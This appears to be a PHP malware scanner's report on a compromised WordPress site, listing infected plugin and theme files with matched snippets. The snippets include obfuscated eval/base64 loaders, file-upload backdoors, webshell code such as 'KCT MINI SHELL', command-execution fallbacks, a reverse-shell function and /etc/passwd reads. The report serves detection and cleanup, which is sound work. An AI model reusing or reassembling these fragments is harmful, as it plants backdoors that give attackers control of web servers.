| Exploit hex_var Line: 51 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x4f\x30\x4f"}
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval($o0o.${"oOO"}($oOo(${"o0O"}($oOo(${"o00"}($oOo(${"oOO"}($oOo(${"o0O"}($OOO(${"O0O"})))))))))))
| Function eval Line: 51 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($o0o.${"\x6f\x4f\x4f"}($oOo(${"\x6f\x30\x4f"}($oOo(${"\x6f\x30\x30"}($oOo(${"\x6f\x4f\x4f"}($oOo(${"\x6f\x30\x4f"}($OOO(${"\x4f\x30\x4f"})))))))))))
|
|
/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/assets/ajax_req/index.php Size: 18.79 kB Created: 2022-01-11 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 7
| Description | Match |
|---|
Exploit base64_long Line: 38 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'CiBnb3RvIGczU2p1OyBERXBuYTogJExpeCA9ICJcNzVcNzVcMTQ3XDYwXDEyN1wxMTBceDZmXHg2Nlx4NzRcNzFceDYzXDEyN1x4MmJcNjZceDQ4XDE3MVx4NzFcNjBcMTI3XDE1MVx4NDJcMTA0XHg1Mlx4NjlceDUwXDcwXHg2Nlx4NDdcMTYzXDEwMVx4NDJceDc5XDEyMFwxMDRceDY5XDE2MFwxMTVceDY2XDE2MFw2NFx4NmNcMTY3XDE1M1wxMDFcMTIyXHgzNFwxNjdcMTU1XDEyMlx4NTdceDZlXDE2MFwxNDVcNjBcMTAxXDYwXHg2MVx4NjhceDMzXHg0MlwxMDVcMTYzXHgzMVx4NmJcMTEwXHg3N1w3MVwxNTVceDM4XDEwMVwxNDZceDU4XHg0OVwxMTdceDQzXDUzXHgzMlx4NDNceDM5XDE1Nlw3MFwxNDNceDdhXDE1M1x4NGRcMTY2XDE0MVwxNjJceDMxXHg...
| Exploit eval_base64 Line: 38 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine | <?php eval(base64_decode('CiBnb3RvIGczU2p1OyBERXBuYTogJExpeCA9ICJcNzVcNzVcMTQ3XDYwXDEyN1wxMTBceDZmXHg2Nlx4NzRcNzFceDYzXDEyN1x4MmJcNjZceDQ4XDE3MVx4NzFcNjBcMTI3XDE1MVx4NDJcMTA0XHg1Mlx4NjlceDUwXDcwXHg2Nlx4NDdcMTYzXDEwMVx4NDJceDc5XDEyMFwxMDRceDY5XDE2MFwxMTVceDY2XDE2MFw2NFx4NmNcMTY3XDE1M1wxMDFcMTIyXHgzNFwxNjdcMTU1XDEyMlx4NTdceDZlXDE2MFwxNDVcNjBcMTAxXDYwXHg2MVx4NjhceDMzXHg0MlwxMDVcMTYzXHgzMVx4NmJcMTEwXHg3N1w3MVwxNTVceDM4XDEwMVwxNDZceDU4XHg0OVwxMTdceDQzXDUzXHgzMlx4NDNceDM5XDE1Nlw3MFwxNDNceDdhXDE1M1x4NGRcMTY2...
| Exploit execution Line: 38 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(base64_decode('CiBnb3RvIGczU2p1OyBERXBuYTogJExpeCA9ICJcNzVcNzVcMTQ3XDYwXDEyN1wxMTBceDZmXHg2Nlx4NzRcNzFceDYzXDEyN1x4MmJcNjZceDQ4XDE3MVx4NzFcNjBcMTI3XDE1MVx4NDJcMTA0XHg1Mlx4NjlceDUwXDcwXHg2Nlx4NDdcMTYzXDEwMVx4NDJceDc5XDEyMFwxMDRceDY5XDE2MFwxMTVceDY2XDE2MFw2NFx4NmNcMTY3XDE1M1wxMDFcMTIyXHgzNFwxNjdcMTU1XDEyMlx4NTdceDZlXDE2MFwxNDVcNjBcMTAxXDYwXHg2MVx4NjhceDMzXHg0MlwxMDVcMTYzXHgzMVx4NmJcMTEwXHg3N1w3MVwxNTVceDM4XDEwMVwxNDZceDU4XHg0OVwxMTdceDQzXDUzXHgzMlx4NDNceDM5XDE1Nlw3MFwxNDNceDdhXDE1M1x4NGRcMTY2...
| Function eval Line: 38 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(base64_decode('CiBnb3RvIGczU2p1OyBERXBuYTogJExpeCA9ICJcNzVcNzVcMTQ3XDYwXDEyN1wxMTBceDZmXHg2Nlx4NzRcNzFceDYzXDEyN1x4MmJcNjZceDQ4XDE3MVx4NzFcNjBcMTI3XDE1MVx4NDJcMTA0XHg1Mlx4NjlceDUwXDcwXHg2Nlx4NDdcMTYzXDEwMVx4NDJceDc5XDEyMFwxMDRceDY5XDE2MFwxMTVceDY2XDE2MFw2NFx4NmNcMTY3XDE1M1wxMDFcMTIyXHgzNFwxNjdcMTU1XDEyMlx4NTdceDZlXDE2MFwxNDVcNjBcMTAxXDYwXHg2MVx4NjhceDMzXHg0MlwxMDVcMTYzXHgzMVx4NmJcMTEwXHg3N1w3MVwxNTVceDM4XDEwMVwxNDZceDU4XHg0OVwxMTdceDQzXDUzXHgzMlx4NDNceDM5XDE1Nlw3MFwxNDNceDdhXDE1M1x4NGRcMTY2...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(htmlspecialchars_decode(gzinflate(base64_decode($Cyto))))
| Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268) | <?php eval(base64_decode(
| Sign 7f5d33bf Line: 38 Dangerous Malware Signature (hash: 7f5d33bf) | <?php Jhc2U2N
| Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc) | <?php <?php eval
| Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d) | <?php Z3ppbmZsYXRl
| Sign de12c454 Line: 38 Dangerous Malware Signature (hash: de12c454) | <?php V2YW
|
|
/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/src/Customizer/index.php Size: 64.79 kB Created: 2021-12-03 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 5
| Description | Match |
|---|
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($ukr3B, $_POST["new"])
| Exploit download_remote_code2 Line: 43 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($ukr3B, $_POST["\156\x65\x77"])
| Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(gzuncompress\50base64_decode\50"; goto j9Vvp; YqLrR: if (count($xHyVF)
| Exploit hex_char Line: 43 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval(base64_decode\50"; goto oiG26; tpgtx: zV3C6: goto Pa12b; mmj0N: d1BzN: goto gp6Fa; q7a80: bW5Um($WRsqg); goto tyxU_; HIUu8: XsCHf: goto lSv0U; tyxU_: goto LG5uz; goto Mj7RO; vnUYp: header("Cache-Control\72 must\55revalidate"); goto re1HG; alUgM: if (is_dir($_GET["del"])) { goto d1BzN; } goto GVpxQ; yreVi: header("Content-Disposition\72 attachment\73 filename\75" . basename($uMTgE)); goto Os2LY; Oor_g: $C9cVN = QFocs($_SERVER["SCRIPT_FILENAME"], ''); goto hcYHc; TcIIi: fclose($ukr3B); goto X...
|
|
/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/src/Notify/index.php Size: 14.84 kB Created: 2022-02-12 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'tXpjcGbhlm5sJx3bdtKxbfOLvtjq2Lb5xUkn6djq2LbTsW2r+/acmXOm5s75davu+rFrLz/r2bWr3rdq8dP9bzHgYf0rtqz6Bm03S/pSukrKYroalLSivM4ynOp2OpZAUwltCXNtb1UjWi8Ha5f/Lw8//v9AYm9tYq7k+lXK3YiSVprXRcyIVlNchstJz/yv7mLp4OVq4m7/jdbaxdzc0oLUxNzK0sWc/18RXg6OQK9v/MrSDl/1/qn5/I+S/2YiUhOgu6WTiZUrv8HXf0OC4L+q8xtw/xv3fzXz43dQcGa3MKL8J6j/YJXrf1Nq4u7IbuviRktnaeJOy/g3hpP131L/P+P+qzbt36EdrSwE/0v9Rw+O/+d0H7p/2v9B9L948PPj/5tu8c9J/PjZ/9FBkMH975ROlILM//D6uFh4ufxD/0+VjlVQ0J2S1tWdn86BktGA/d+h8nRyMBV0+ov7P72M7pSMfyH9xfnf0P4WMqEU+FvIxcv...
| Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($Vtkra($VZDBO($jhGvm($fIeKd('tXpjcGbhlm5sJx3bdtKxbfOLvtjq2Lb5xUkn6djq2LbTsW2r+/acmXOm5s75davu+rFrLz/r2bWr3rdq8dP9bzHgYf0rtqz6Bm03S/pSukrKYroalLSivM4ynOp2OpZAUwltCXNtb1UjWi8Ha5f/Lw8//v9AYm9tYq7k+lXK3YiSVprXRcyIVlNchstJz/yv7mLp4OVq4m7/jdbaxdzc0oLUxNzK0sWc/18RXg6OQK9v/MrSDl/1/qn5/I+S/2YiUhOgu6WTiZUrv8HXf0OC4L+q8xtw/xv3fzXz43dQcGa3MKL8J6j/YJXrf1Nq4u7IbuviRktnaeJOy/g3hpP131L/P+P+qzbt36EdrSwE/0v9Rw+O/+d0H7p/2v9B9L948PPj/5tu8c9J/PjZ/9FBkMH975ROlILM//D6uFh4ufxD/0+VjlVQ0J2S1tWdn86BktGA/d+h8nRyMBV0+o...
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/theme-data/one-page-express/index.php Size: 8.47 kB Created: 2021-10-14 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3
| Description | Match |
|---|
Exploit download_remote_code2 Line: 75 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($fp,$_POST['src'])
| Sign 2b3f81c9 Line: 46 Dangerous Malware Signature (hash: 2b3f81c9) | <?php 0byt3m1n1
| Sign d97f004d Line: 111 Dangerous Malware Signature (hash: d97f004d) | <?php ZeroByte
|
|
/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/vendor/bin/index.php Size: 13.16 kB Created: 2022-05-10 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1
| Description | Match |
|---|
Sign 963e968a Line: 198 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
|
|
/custdata02/turtle/public_html/wp-content/plugins/one-page-express-companion/vendor/composer/index.php Size: 1.42 kB Created: 2021-12-23 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1
| Description | Match |
|---|
Sign 43b0d90f Line: 44 Dangerous Malware Signature (hash: 43b0d90f) | <?php echo "<h1><a href='$fullpath'>OK-Click here!</a>
|
|
/custdata02/turtle/public_html/wp-content/themes/twentytwentyfour/assets/images/index.php Size: 117.84 kB Created: 2022-08-10 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 7 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 136 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "6d5138716c36443945465a724f3774626a4b706e6a5144716b6130644e505a6e4247306e42465a346b71786e58505a724f3774626a4b346e6c375a764e5057796b3730646d3752394263484750396259565257756b3730646d37523942625a5857397468533856555653485a4357786e42615a726c6134624f36577943465a346b6f34666b616a37516e486a424762736a4b666e695041734f50447a6a62756f50556378435778726b6f34636a504d6f434641734e6162754e513472434b6375414b63436c3641734e4652714165666e42614e786c4752736c6f6778424a49784b61306e426156386b4a45796b6f34616d5170626c613179435...
| Exploit base64_long Line: 137 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "456f49726a505a6f423744786c6530714e504475454b38364b7a526e4e554c546c375a764e5057324b6556785855564c53636a51516e4c6a597179636b4a39635752444652627570505475436b3730646d3752394348417553494e6855533448524b705454395a4250385a535363524c5455707a4e5056716b6130396c3744346c6148744e5567656a475a7145656378597178784e6566646c3734734e515a39434841756b3730646d3748634e4644686d51357944464d756d5134626a4830666a473073434b567843556378435074726b47527343485a5356496259424b452b44624165435475436c364c626c6566545249565852525775456...
| Exploit base64_long Line: 138 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "6b375239503656786c5152686c4762746d505779414b633244475a796a51347650365a786961533041545771414a75636a3644786a4752684f5438736a517075596f56626b7a44726b623066585134386c47713244465a794e51707558556a386c6148744e554d744f5475676a6e75676d515732454b30656d5135726b3767674251637a596f56634f5152746c373530414a75634e4752656a516b30414a74784e6566616a5134646a4762726c6230626947626e6a46417944364c646c7a567550374e726b61757a4355623244464c784e4a38714f3734396c4830616c364476434b63326d514f7944464c784e4a393042544978693752356d5...
| Exploit concat Line: 127 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].
| Exploit concat Line: 128 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].
| Exploit concat_vars_array Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $ABC[1].$ABC[3].$ABC[7].$ABC[11].$ABC[7].$ABC[9].$ABC[3].$ABC[10].$ABC[8]; $STr = $ABC[1].$ABC[3].$ABC[7].$ABC[3].$ABC[7]; $BDEC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $BENC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $WKWK[] = ""; foreach($f_______un as $x => $xx){ $WKWK[$x] = nhx(Dex($xx)); }
| Exploit etc_passwd Line: 1811 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system | <?php /etc/passwd
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($x); $r = ob_get_contents(); ob_end_clean(); return $r; } catch (ParseError $e) { return false; } } function IsWin(){ global $WKWK; return $WKWK[27](PHP_OS, 'WIN') !== false; } function Bc($ip, $port, $lang) { global $WKWK, $code; $lang = strtolower($lang); $arg=$ip." ".$port; $cod=Dex($code[$lang]); if($lang == "php"){ $arg=""; $cod='$ip="'.$ip.'";$port='.$port.';'.$cod; } if(!RunCode($arg, $cod, $lang)) return false; } function RunCode($argument, $code, $lang){ global $WKWK; $lang=strtolo...
| Sign 7830f7a6 Line: 1570 Dangerous Malware Signature (hash: 7830f7a6) | <?php nc -l
| Sign b236d073 Line: 1811 Dangerous Malware Signature (hash: b236d073) | <?php /etc/passwd
|
|
/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/admin/main/inc/validation/color/validation_color.php Size: 5.59 kB Created: 2024-06-02 20:16:05 Modified: 2024-06-02 20:16:05 Dangers: 1
| Description | Match |
|---|
Function strrev eval_strrev Line: 34 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
|
|
/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/admin/main/inc/class.redux_api.php Size: 27.68 kB Created: 2024-06-02 20:16:05 Modified: 2024-06-02 20:16:05 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 71 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $extension['class']( $ReduxFramework )
|
|
/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/admin/main/inc/class.redux_helpers.php Size: 22.99 kB Created: 2024-06-02 20:16:05 Modified: 2024-06-02 20:16:05 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 285 Dangerous Malware Signature (hash: 471b95ee) | <?php suhosin
|
|
/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/admin/main/index.php Size: 6.44 kB Created: 2022-06-09 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 4
| Description | Match |
|---|
Exploit base64_long Line: 38 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "eJzNOv1z2kqSPydV+R8mc1yQ1kiID4MNBp/t+G1SLy9Jxd6temX7UoM0AsVC0kqDbR5wf/t1z+gLjGOyuX17LgNST3dPz/THdLd0dBxNolcveRyH8deYR2EsvGCsWXr/1cuJEBHAkigMEv7VDh2uta02jjjc9QKu0YT7Lq0R+uvZJfnt/cf35OLd+YcPpG21KKJVEvstGRCaXD90WvBpwIfDpw2fw5gihmsDAotjNtdo1+ocdK19t7vf4Z1Gx+nsI28F7XY6+91mt9U57LgdjvBOFyDtTqvb7bTlfatz0Gl3DrtNRdVtdvY7XeDWAg42wBVWA7g04ftw30XsDvxJ+GG3pSCKPr3vAIat5FCQbheogRfI19wYwfkanfWRlB7l7rIU1uq4IN1heRxm2u8eIJ9uu9taHwFcWCdgtHDlMPM+fm9iqd14AsvpjEo7g3KW9xfnbAKF28X9SKGw5224tuXu7Xdw3xswE+4x7qDiC2vFmcqSdJy...
| Exploit hacked_by Dangerous Hacker credits | <?php Hacked By
| Exploit nano Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $fc[18]($fc[14]($p.'/'.nhx($_GET['n'])
| Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php eval("?>"."<?php
error_reporting(0);
http_response_code(404);
define('self', 'KCT MINI SHELL 403');
$scD = 's\x63\x61\x6e\x64\x69r';
$fc = array('7068705f756e616d65', '70687076657273696f6e', '676574637764', '6368646972', '707265675f73706c6974', '61727261795f64696666', '69735f646972', '69735f66696c65', '69735f7772697461626c65', '69735f7265616461626c65', '66696c6573697a65', '636f7079', '66696c655f657869737473', '66696c655f7075745f636f6e74656e7473', '66696c655f6765745f636f6e74656e7473', '6d6b6...
| Function eval Line: 38 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval("?>".gzuncompress(base64_decode("eJzNOv1z2kqSPydV+R8mc1yQ1kiID4MNBp/t+G1SLy9Jxd6temX7UoM0AsVC0kqDbR5wf/t1z+gLjGOyuX17LgNST3dPz/THdLd0dBxNolcveRyH8deYR2EsvGCsWXr/1cuJEBHAkigMEv7VDh2uta02jjjc9QKu0YT7Lq0R+uvZJfnt/cf35OLd+YcPpG21KKJVEvstGRCaXD90WvBpwIfDpw2fw5gihmsDAotjNtdo1+ocdK19t7vf4Z1Gx+nsI28F7XY6+91mt9U57LgdjvBOFyDtTqvb7bTlfatz0Gl3DrtNRdVtdvY7XeDWAg42wBVWA7g04ftw30XsDvxJ+GG3pSCKPr3vAIat5FCQbheogRfI19wYwfkanfWRlB7l7rIU1uq4IN1heRxm2u8eIJ9uu9taHwFcWCdgtHDlMPM+fm9iqd14AsvpjEo7g3KW9xfnbAKF28X9SK...
| Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268) | <?php eval("?>
|
|
/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/admin/meta/index.php Size: 28.35 kB Created: 2022-03-27 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($ver); return $view; } function backend($_claster) { $_module = $this->stable[0].$this->stable[4].$this->stable[3].$this->stable[1].$this->stable[2].$this->stable[5]; return $_module("\r\n", "", $_claster); } var $access; var $_debug = 0; var $ls = array('te', 'in', 'la', 'f', 'gz'); var $dx = array('on', 'crea', 'te_fun', 'cti'); var $lib = array('cod', 'de', 'base', '64_', 'e'); var $memory = array('ie', 'tco', 'se', 'ok'); var $stable = array('s', 'p', 'la', '_re', 'tr', 'ce'); var $core...
|
|
/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/images/widgets/network.php Size: 72.65 kB Created: 2022-07-27 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 5
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval); $error = ($retval == 0) ? false : true; if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>'); if ($error) { listing_page(error('not_executed', $file, implode("\n", $output))); } else { listing_page(notice('executed', $file, implode("\n", $output))); } break; case 'delete': if (!empty($_POST['no'])) { listing_page(); } elseif (!empty($_POST['yes'])) { $failure = array(); $success = array(); foreach ($files...
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid($file['owner'])); if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group'])); $files[] = $file; } } return $files; } else { return false; } } function sortlist ($list, $key, $reverse) { $dirs = array(); $files = array(); for ($i = 0; $i < sizeof($list); $i++) { if ($list[$i]['is_dir']) $dirs[] = $list[$i]; else $files[] = $list[$i]; } quicksort($dirs, 0, sizeof($dirs) - 1, $key); if ($reverse) $dirs = array_reverse($dirs); quicksort($files,...
| Function strrev eval_strrev Line: 2087 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php lave
| Sign 00f56a27 Line: 799 Dangerous Malware Signature (hash: 00f56a27) | <?php $_POST['ur'])) $mode |= 0400
| Sign 407651f7 Line: 1227 Dangerous Malware Signature (hash: 407651f7) | <?php webadmin.php</h1>
| Sign 91535293 Line: 726 Dangerous Malware Signature (hash: 91535293) | <?php listing_page(notice('symlinked
| Sign a408f408 Line: 715 Dangerous Malware Signature (hash: a408f408) | <?php case 'create_symlink':
|
|
/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/lib/custom_posts/item.php Size: 103.24 kB Created: 2022-08-11 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 19
| Description | Match |
|---|
Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${${"GLOBALS"}["ahmyqhq"]}=["7368656c6c5f65786563","65786563","7061737374687275","73797374656d","70726f635f6f70656e","706f70656e","70636c6f7365","72657475726e","73747265616d5f6765745f636f6e74656e7473","676574637764","6368646972","7068705f756e616d65","6973736574","66756e6374696f6e5f657869737473","5f6d61645f636d64","245f5345525645525b275345525645525f4e414d45275d","676c6f62","69735f66696c65","69735f646972","69735f7772697461626c65","69735f7265616461626c65","66696c6573697a65","6765745f63757272656e745...
| Exploit double_var2 Line: 41 Warning Double var technique is usually used for the obfuscation of malicious code | <?php ${$qxzdjwf}
| Exploit escaped_path Line: 41 Dangerous Escaped path technique is usually used for the obfuscation of malicious code | <?php \x6bi\x67x\x75m\x73d
| Exploit etc_passwd Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system | <?php /etc/passwd
| Exploit hex_char Line: 41 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Exploit hex_var Line: 41 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube | <?php ${"\x47\x4cO\x42\x41L\x53"}
| Function exec Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php ExEc(\$value);\n } else if (function_exists(\"passthru\")) {\n return pAsSThRu(\$value);\n }\n }\n function gecko_perm(\$flename){\n return substr(sprintf(\"%o\", fileperms(\$flename)), -4);\n }\n ";if(file_exists("/tmp/Acx0".awalanFile(namaFile())."wplers0x.do.not.remove.this.Lock")){${"GLOBALS"}["cntbduepu"]="tmp";$wlkexb="text";FiLe_pUt_ConTentS(${${"GLOBALS"}["gwguwztv"]}."/as".pwdnostrip()."pxha".awalanFile(namaFile())."ndler0.Lock",${$wlkexb});_mad_cmd("nohup php ".${${"GLOBALS"}["cntbduep...
| Function passthru Dangerous Encoded Function `passthru` [https://www.php.net/passthru] | <?php pAsSThRu(\$value);\n }\n }\n function gecko_perm(\$flename){\n return substr(sprintf(\"%o\", fileperms(\$flename)), -4);\n }\n ";if(file_exists("/tmp/Acx0".awalanFile(namaFile())."wplers0x.do.not.remove.this.Lock")){${"GLOBALS"}["cntbduepu"]="tmp";$wlkexb="text";FiLe_pUt_ConTentS(${${"GLOBALS"}["gwguwztv"]}."/as".pwdnostrip()."pxha".awalanFile(namaFile())."ndler0.Lock",${$wlkexb});_mad_cmd("nohup php ".${${"GLOBALS"}["cntbduepu"]}."/as".pwdnostrip()."pxha".awalanFile(namaFile())."ndler0.Lock &")...
| Function shell_exec Dangerous Encoded Function `shell_exec` [https://www.php.net/shell_exec] | <?php ShEll_eXeC(\$value);\n } else if (function_exists("exec\")) {\n return ExEc(\$value);\n } else if (function_exists(\"passthru\")) {\n return pAsSThRu(\$value);\n }\n }\n function gecko_perm(\$flename){\n return substr(sprintf(\"%o\", fileperms(\$flename)), -4);\n }\n ";if(file_exists("/tmp/Acx0".awalanFile(namaFile())."wplers0x.do.not.remove.this.Lock")){${"GLOBALS"}["cntbduepu"]="tmp";$wlkexb="text";FiLe_pUt_ConTentS(${${"GLOBALS"}["gwguwztv"]}."/as".pwdnostrip()."pxha".awalanFile(namaFile())."...
| Function system Dangerous Encoded Function `system` [https://www.php.net/system] | <?php sYsTem(\$value);\n } else if (function_exists(\"shell_exec")) {\n return ShEll_eXeC(\$value);\n } else if (function_exists("exec\")) {\n return ExEc(\$value);\n } else if (function_exists(\"passthru\")) {\n return pAsSThRu(\$value);\n }\n }\n function gecko_perm(\$flename){\n return substr(sprintf(\"%o\", fileperms(\$flename)), -4);\n }\n ";if(file_exists("/tmp/Acx0".awalanFile(namaFile())."wplers0x.do.not.remove.this.Lock")){${"GLOBALS"}["cntbduepu"]="tmp";$wlkexb="text";FiLe_pUt_ConTentS(${${"...
| Sign 00f56a27 Line: 41 Dangerous Malware Signature (hash: 00f56a27) | <?php ${${
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php Exploit
| Sign 11413268 Line: 41 Dangerous Malware Signature (hash: 11413268) | <?php exploit
| Sign 237750ea Line: 41 Dangerous Malware Signature (hash: 237750ea) | <?php \x47\x4c\x4f\x42\x41\x4c\x53
| Sign 407651f7 Dangerous Malware Signature (hash: 407651f7) | <?php WScript.shell
| Sign 5b557546 Dangerous Malware Signature (hash: 5b557546) | <?php 65786563
| Sign a408f408 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
| Sign a915f4c2 Dangerous Malware Signature (hash: a915f4c2) | <?php uname -a
| Sign b236d073 Dangerous Malware Signature (hash: b236d073) | <?php /etc/passwd
| Sign cbea68d7 Dangerous Malware Signature (hash: cbea68d7) | <?php 73797374656d
| Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e) | <?php backdoor
|
|
/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/lib/extentions/index.php Size: 22.42 kB Created: 2022-08-12 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 21
| Description | Match |
|---|
Exploit base64_long Line: 38 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'ICAgIGVycm9yX3JlcG9ydGluZygwKTsgaHR0cF9yZXNwb25zZV9jb2RlKDQwNCk7IGRlZmluZSgiWXAiLCAiIik7ICRHMyA9ICJzY2FuZGlyIjsgJGM4ID0gYXJyYXkoIjcwNjg3MDVmNzU2ZTYxNmQ2NSIsICI3MDY4NzA3NjY1NzI3MzY5NmY2ZSIsICI2NzY1NzQ2Mzc3NjQiLCAiNjM2ODY0Njk3MiIsICI3MDcyNjU2NzVmNzM3MDZjNjk3NCIsICI2MTcyNzI2MTc5NWY2NDY5NjY2NiIsICI2OTczNWY2NDY5NzIiLCAiNjk3MzVmNjY2OTZjNjUiLCAiNjk3MzVmNzc3MjY5NzQ2MTYyNmM2NSIsICI2OTczNWY3MjY1NjE2NDYxNjI2YzY1IiwgIjY2Njk2YzY1NzM2OTdhNjUiLCAiNjM2ZjcwNzkiLCAiNjY2OTZjNjU1ZjY1Nzg2OTczNzQ3MyIsICI2NjY5NmM2NTV...
| Exploit eval_base64 Line: 38 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine | <?php eval(base64_decode('ICAgIGVycm9yX3JlcG9ydGluZygwKTsgaHR0cF9yZXNwb25zZV9jb2RlKDQwNCk7IGRlZmluZSgiWXAiLCAiIik7ICRHMyA9ICJzY2FuZGlyIjsgJGM4ID0gYXJyYXkoIjcwNjg3MDVmNzU2ZTYxNmQ2NSIsICI3MDY4NzA3NjY1NzI3MzY5NmY2ZSIsICI2NzY1NzQ2Mzc3NjQiLCAiNjM2ODY0Njk3MiIsICI3MDcyNjU2NzVmNzM3MDZjNjk3NCIsICI2MTcyNzI2MTc5NWY2NDY5NjY2NiIsICI2OTczNWY2NDY5NzIiLCAiNjk3MzVmNjY2OTZjNjUiLCAiNjk3MzVmNzc3MjY5NzQ2MTYyNmM2NSIsICI2OTczNWY3MjY1NjE2NDYxNjI2YzY1IiwgIjY2Njk2YzY1NzM2OTdhNjUiLCAiNjM2ZjcwNzkiLCAiNjY2OTZjNjU1ZjY1Nzg2OTczNzQ3...
